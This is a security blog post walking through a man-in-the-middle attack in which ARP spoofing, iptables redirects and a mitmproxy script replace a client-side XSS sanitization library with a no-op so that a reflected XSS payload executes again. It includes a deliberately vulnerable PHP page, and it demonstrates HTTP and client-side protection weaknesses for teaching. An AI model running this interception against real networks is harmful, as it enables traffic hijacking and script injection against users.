MITM XSS Protection – Still Popping Alerts

I recently had to demonstrate the dangers of loading external resources over HTTP as well as security libraries running on the client side. In this case, I went with an attack to MITM XSS protection, and this was the result.

Vulnerable Application

First, take the following vulnerable application.


<title>Safe from XSS now(?)</title>


I'm no longer vulnerable: <?php echo $_GET['value']; ?>



A simple application that takes a GET parameter and echos it to the page.

MITM XSS Protection - Vulnerable

As you can tell, this application is obviously vulnerable to XSS.

MITM XSS Protection - Alert 1

Securing the Application

In this case, our target actually smartened up to our attacks, and started using an input sanitization library.

Following the example on the GitHub page, the target application was now a bit more secure.


<title>Safe from XSS now(?)</title>


I'm no longer vulnerable:
<script src=""></script>
// apply function filterXSS in the same way
var html = filterXSS(decodeURIComponent('<?php echo urlencode($_GET['value']); ?>'));



Now, when we try our previous payload, it no longer works.

MITM XSS Protection - Protected

The reason for this is that the library is now HTML encoding our payload.

MITM XSS Protection - HTML Encoded

As you can see, the browser is sending the input to the filterXSS method before being written to the page. Note that the decodeURIComponent and URL encoding is to just prevent closing script tags from breaking this "protection".

MITM XSS Protection - Protection Script

MITM XSS Protection - The Attack

Like any good attacker, we won't stop because of a little client side protection for our XSS attacks.

In this case, I used mitmproxy and a custom script to modify the response. If the request was for, then I replace the content with my own neutered function.

import libmproxy

def response(context, flow):
    url = flow.request.scheme + "://" + + flow.request.path

    if url == "":
        flow.response.code = 200
        flow.response.content = "function filterXSS (input) { return input; }"

To use this script, I setup some iptables rules to forward traffic to mitmproxy, setup ARP spoofing between my victim and the router, and started mitmproxy.

root@kali:~# iptables -t nat -F
root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
root@kali:~# arpspoof -i eth1 -t
root@kali:~# arpspoof -i eth1 -t
root@kali:~# mitmproxy --anticache -s -T --host

Now, the next time that my "victim" browsed to the vulnerable application, I saw their request for the XSS library.

MITM XSS Protection - mitmproxy

Additionally, the response that mitmproxy sent back to them was my useless version.

MITM XSS Protection - MITM response

Finally, my alert popped, and XSS was successful again!

MITM XSS Protection - Alert Popped

Additionally, you can see that the empty filterXSS() method is the one being loaded on the client's side.

MITM XSS Protection - New Method

MITM XSS Protection - Conclusion

While this attack did come with a few caveats, it still demonstrates the dangers of HTTP vs. HTTPS and client side protections.

To perform this attack, an attacker just needs to share a network with the victim, and have some familiarity with the protection that they are attacking.

Other than that, the attack is (mostly) transparent and could be even more sneaky.

doyler on Githubdoyler on Twitter
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

As an Amazon Associate I earn from qualifying purchases.

Common passed on this blog, I made it to a jam.

1 Comment

Filed under Security Not Included

One Response to MITM XSS Protection – Still Popping Alerts

  1. Josh holmes

    Nice dude!

Leave a Reply

Your email address will not be published. Required fields are marked *


This site uses Akismet to reduce spam. Learn how your comment data is processed.